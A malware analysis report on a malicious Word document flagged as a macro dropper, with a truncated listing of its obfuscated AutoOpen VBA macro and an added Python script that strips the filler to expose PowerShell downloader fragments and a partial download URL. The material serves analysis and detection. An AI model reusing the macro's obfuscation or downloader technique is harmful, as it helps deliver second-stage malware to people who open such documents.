Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 69b0aff1321ff1ee…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 149.0 KB
Created: 2018-02-15 00:08:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19

MD5: 5b9b8054b8a874fe7e1f2773cdceec96
SHA-1: b978b78488ca59d93c40cfb8b53fff5c9f18fe13
SHA-256: 69b0aff1321ff1eef57e7327586ac4dd495910e9f09a4fe4cd7681ae1e89e0d1

Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample fires the critical OLE_VBA_SHELL heuristic, indicating a Shell() call inside the VBA macros, and an AutoOpen macro is present, so the code runs as soon as the document is opened (user execution of a malicious file, then a scripting interpreter). The extracted macro hides its command line by padding the module with junk arithmetic and splitting the real payload into string chunks that pass through a decoding helper (HJjkJKD); the chunks visible in the preview carry PowerShell-style fragments ([ChAR] concatenation, .Net.WebClient, try{ blocks and an http:// URL that is cut off in the listing), consistent with a PowerShell downloader for a second-stage payload. The URL http://schemas.openxmlformats.org/drawingml/2006/main listed under Embedded URL is the standard DrawingML XML namespace found in the document body and is not the download location; the actual second-stage URL exists only in obfuscated form inside the macro strings. Note also that the OLE_LEGACY_WORDBASIC_AUTOEXEC description says no modern VBA project was recovered, which the extracted macros.bas contradicts; read that heuristic's text as the tool's generic description, not a sample-specific finding.

Heuristics (7)

  • CLAMAV_DETECTION (critical): ClamAV: Doc.Dropper.Agent-6453491-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6453491-0
  • OLE_VBA_MACROS (medium, 3 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    Shell() call in VBA
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
    AutoOpen macro
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31973 bytes
SHA-256: cb8c4cab5dbbe7c29b289f04082366e6b751837d4a955057ffe770b7229a75ad

Script preview (first 1,000 lines of the extracted script; the listing below is cut off):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "uiamiwq"
Function simVQWjHOdd()
On Error Resume Next
aFYRds = (opWNErtw - Int(mXNOhq) * WwJipujIOjtr / Oct(NkriPJmwDuSdI) - (GZvQEtcQpvJdtI - Sin(2805218)))
VrljDtIds = (VzCErCfjzYEpSD - Int(EjuaiTSpzPzuv) * mPihFYUb / Oct(IDtMR) - (pnwlFFwziff - Sin(660610)))
FTEnmpAcnsD = (EouHjP - Int(IaHMiVc) * mWoGAJIbzI / Oct(OqQvBZVMXPNwK) - (FXPjlHjcTMLqYC - Sin(9732696)))
pcjWqVLrK = (flkOmoEs) + HJjkJKD("wRsIcuwUjkdwmTZYjainext(1Fai+Fai0000Fai+Ff8Z+f8Zai, 28Fai'+'+Fai2133Fai+FaiByS+ByS)Fai+Fai;nuBAFai+FaiDCFai+f8Z+f8ZFaiX =ByS+ByS eKcFai+Fai Fai+FByS+BySaf8Z+f8Zihf8Z+f8ZFai+FaittFaBy'+'S+BySi+FaipFai+f8'+'Z+fbSIQ", 18, 191)
zKztZahRCOI = (WDkKASNbCRzR - Int(iilazzZXFnkLOG) * CRhzlNz / Oct(tvmqvdKHdNNN) - (HVQDhO - Sin(3284257)))
skUzYCzXVjY = (zwmLBZlk - Int(fijqrfLHiuufHw) * tEuvR / Oct(DziYtwAiuDZXi) - (iiRQqFwDUWk - Sin(8565164)))
qbzliUiO = (kSzip - Int(EbjARzjK) * jqVIcPXPni / Oct(LwAfMn) - (vPMwY - Sin(6904191)))
VKwAJ = (aiJvmtvOBH) + HJjkJKD("DnjNCuwtoijGhPaVZlLCwVySm.Net.WebCliFai+Faient;nuBNFai+FaiSB = nFai+FaiuBFai+FainFai+Faisadasd.FaByS+BySi+FbOsHkYL", 23, 85)
tfihRZzjz = (CKAkHGb - Int(odwnv) * nRlEDJcm / Oct(LwRfjBLMlKCJ) - (YzwTiqoVVTzC - Sin(6238909)))
jQoSIXtB = (PXMbkPW - Int(lpauCdRLdsGA) * lHjimzSpfSdAq / Oct(oZiStPjNGskoLD) - (pHvfRiP - Sin(5467193)))
ikObmp = (wSEwGXzuLicluZ - Int(kJYAruz) * OipLiUYRZwmU / Oct(LlGjupcdaZ) - (hivIGOkBAjpTR - Sin(2341125)))
zbvmi = (HuSTdBbPk) + HJjkJKD("KS+f8Z+f8ZBySi in Fai+FainuFaf8Z+f8Z'+'i+FaiBADCByS+BySXFai+Fai){tr'+'y{f8Z+f8Znuf8Z+f8ZBFai+Ff8Z+f8ZaiYFai+FaiYU.pQByS+BySZDon8fFai+FaiWnlFai+Faf8Z+f8Zin8fOaNLSDpqFCXv", 2, 157)
OGfwGSHz = (ZQLLL - Int(TvVRpXfPpMXk) * cwWjowowfXCO / Oct(iOAWFrdXl) - (DHbuRpfwPVIBD - Sin(538779)))
cMKSGcStwz = (WOXnoYTDToQ - Int(TGfGOqG) * cNCWHAbm / Oct(NhLwqjdFkzRjE) - (FAaMpk - Sin(2878864)))
fwJdFRuqZ = (LzjDJLBfnzhKG - Int(FQcXCB) * sojYFzWhnl / Oct(dTVOO) - (aREEJUCtBzuJ - Sin(6874876)))
kzjzjjT = (YYRRwEVInFvd) + HJjkJKD("zwwWdhfXHFai+FaiYYU Fai+Fai= .(eFai+FaiIROCBNXZEaDGidkwmCcHzKXobWAuaU", 10, 30)
iSwCwUM = (pzkzZ - Int(UhfDzbXDTUP) * CFOHW / Oct(ZGJIX) - (OLDHtVz - Sin(3094539)))
IGXCKb = (koSzzOCawsKRk - Int(loiahXTYLKT) * oYQKzXzMSRvIW / Oct(XfNQMuicRTLu) - (sWLdIjKa - Sin(5839721)))
WIVGMKEo = (munRXQ - Int(saEsAnLu) * ZLLGzwDHHqGomb / Oct(OsVbVZc) - (LzalpX - Sin(8460002)))
ERQTLEjGbwM = (iwALfhnmr) + HJjkJKD("HPJWYZmnuFaiByf8Z+f8ZS+ByS+Faif8Z+f8ZBasfcFai+FaBf8Z+f8ZykQjDKnVXXjtnzfijsWYjz", 8, 50)
qdtndsN = (kZYwEAIW - Int(NjPHGGb) * NAUInisRZ / Oct(SUnzt) - (QQImJtOOqbd - Sin(9305767)))
MnQjhjl = (ZDZddidmKwvfif - Int(qBZQpfrqzpLUlF) * MAwWAztr / Oct(SQzFTN) - (fOPYoB - Sin(2507077)))
VJGrzKCb = (PiNboS - Int(rhskuj) * iBwKOz / Oct(ilWjjfFWh) - (KnqGSjRDsI - Sin(4663586)))
mSUKJmAqSi = (jKfFwsdH) + HJjkJKD("MQmdIabjzzUBRzlai+Fai5cGByS+ByS/f8Z+f8Z?htFai+FaByS+BySitpFai+Fai:Fai+Fai//reaFai+Fail-Fai+FaiexpFaif8Z+f8Z'+'+BzFYw", 16, 97)
YNQTRma = (PaGtBMRfHWoBSX - Int(QLJWHFwXYJYV) * ZwGDCQwHMiVXz / Oct(XQafPYCbsciNtQ) - (ijcqY - Sin(998370)))
djkUAzV = (QlwBZj - Int(hnwKJ) * HzdJwpwFdV / Oct(WhEiusjYrPzp) - (OzWXLpjDkqw - Sin(7079331)))
vbLpjZcGfRP = (TtiGCn - Int(JirbZnuR) * SLHIwuzTbuol / Oct(mrItnZnpkMMZ) - (jHuzXuSRS - Sin(5919136)))
UUksHXkO = (mPjhwrrEmEV) + HJjkJKD("WCc.f8Z+f8ZpQZFai+f8'+'Z+f8ZFaiToFai'+'+FaiStrnFai+ByS+BySVbCdtcjvNkmzoRTmHmzWWosLrZjfzrAhLEjH", 3, 56)
MNldusJWGf = (LqYiWtTUU - Int(TQiAqaG) * NuzrG / Oct(QYYnVkfutj) - (GqzmFLC - Sin(4665420)))
YzuJfcVPWi = (zPUVnVawjnaU - Int(zOzVfzjhZWv) * kkGRIjwSRcAD / Oct(zAKjO) - (ItWslo - Sin(6868137)))
WzdjviaddV = (CpHatZiDkUi - Int(EdBRVNuSj) * ZzKQmtNsUdYDtd / Oct(BHiUvP) - (EqBisFXXtRwDP - Sin(1890825)))
moTvZ = (jzVivhzui) + HJjkJKD("piZNthAR]108f8'+'Z+f8Z+[ChAR]55+[f8Z+f8ZChAR]72),BySLopBySf8Z+f8Z).rEpLaCE(([ChAR'+']70+[ChAf8Z
... (truncated)
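The string chunks handed to HJjkJKD() in the listing above are readable once the repeated filler sequences are removed. The following is an added example, not code from the report or from the sample: it takes three chunks copied from the preview (lines of the macro shown above), strips the sequences Fai+Fai, ByS+ByS, f8Z+f8Z and '+' until nothing changes (nested filler such as Fai+Ff8Z+f8Zai only becomes removable after the inner sequence is gone), decodes the PowerShell [ChAR]n+[ChAR]m concatenation visible in the last chunk, and greps the result for downloader indicators. Treating those four sequences as inert filler is an assumption drawn from inspecting the chunks; the body of HJjkJKD() and the meaning of its two numeric arguments are not in the excerpt, so the leading and trailing junk around each fragment is left in place rather than guessed at, and the cut-off URL is not completed.

```python
"""Strip the string-filler obfuscation seen in the HJjkJKD() arguments.

Assumption: Fai+Fai, ByS+ByS, f8Z+f8Z and '+' are inert filler spliced into a
PowerShell command. This is inferred from the visible chunks, not recovered from
HJjkJKD(), whose body is not in the excerpt.
"""
from __future__ import annotations

import re

# Filler sequences inferred from the visible chunks (assumption).
FILLER = ["'+'", "f8Z+f8Z", "ByS+ByS", "Fai+Fai"]

# String literals copied verbatim from the macro preview above.
CHUNKS = {
    "L62": "wRsIcuwUjkdwmTZYjainext(1Fai+Fai0000Fai+Ff8Z+f8Zai, 28Fai'+'+Fai2133Fai+FaiByS+ByS)"
           "Fai+Fai;nuBAFai+FaiDCFai+f8Z+f8ZFaiX =ByS+ByS eKcFai+Fai Fai+FByS+BySaf8Z+f8Zih"
           "f8Z+f8ZFai+FaittFaBy'+'S+BySi+FaipFai+f8'+'Z+fbSIQ",
    "L66": "DnjNCuwtoijGhPaVZlLCwVySm.Net.WebCliFai+Faient;nuBNFai+FaiSB = nFai+FaiuBFai+Fain"
           "Fai+Faisadasd.FaByS+BySi+FbOsHkYL",
    "L82": "MQmdIabjzzUBRzlai+Fai5cGByS+ByS/f8Z+f8Z?htFai+FaByS+BySitpFai+Fai:Fai+Fai//rea"
           "Fai+Fail-Fai+FaiexpFaif8Z+f8Z'+'+BzFYw",
}


def strip_filler(chunk: str) -> str:
    """Remove filler until a fixed point is reached.

    One pass is not enough: removing f8Z+f8Z from Fai+Ff8Z+f8Zai leaves
    Fai+Fai, which must itself be removed on the next pass.
    """
    prev = None
    while prev != chunk:
        prev = chunk
        for token in FILLER:
            chunk = chunk.replace(token, "")
    return chunk


# PowerShell builds strings at run time as [ChAR]108+[ChAR]55+... (case varies).
CHAR_CONCAT = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)


def decode_char_concat(expr: str) -> str:
    """Turn a [ChAR]n+[ChAR]m+... expression into the string it produces."""
    return "".join(chr(int(n)) for n in CHAR_CONCAT.findall(expr))


# Downloader indicators worth pulling from the cleaned fragments.
INDICATORS = re.compile(
    r"https?://[^\s'\"]*|\.Net\.WebClient|DownloadFile|\biex\b|invoke-expression",
    re.IGNORECASE,
)


def extract_indicators(text: str) -> list[str]:
    """Return every indicator match found in a cleaned fragment."""
    return INDICATORS.findall(text)


def deobfuscate_all(chunks: dict[str, str] = CHUNKS) -> dict[str, str]:
    """Clean every chunk, keyed by the preview line it was copied from."""
    return {line: strip_filler(raw) for line, raw in chunks.items()}


if __name__ == "__main__":
    for line, cleaned in deobfuscate_all().items():
        print(f"{line}: {cleaned}")
        print(f"     indicators: {extract_indicators(cleaned)}")
    # The [ChAR] sequence visible on the last preview line decodes to a
    # three-character placeholder that the script later replaces at run time.
    print(decode_char_concat("[ChAR]108+[ChAR]55+[ChAR]72"))
```

Running this shows that the L62 chunk becomes `...next(10000, 282133);nuBADCX = eKc http...`, the L66 chunk exposes `.Net.WebClient`, and the L82 chunk exposes the start of the real download URL, `http://real-exp` (cut off in the preview). Tokens such as `nuB` and `eKc` survive the stripping; together with the `.rEpLaCE(([ChAR]...` calls at the end of the listing they point to a second substitution layer performed inside PowerShell, which this example does not resolve because the replacement map is in the truncated part.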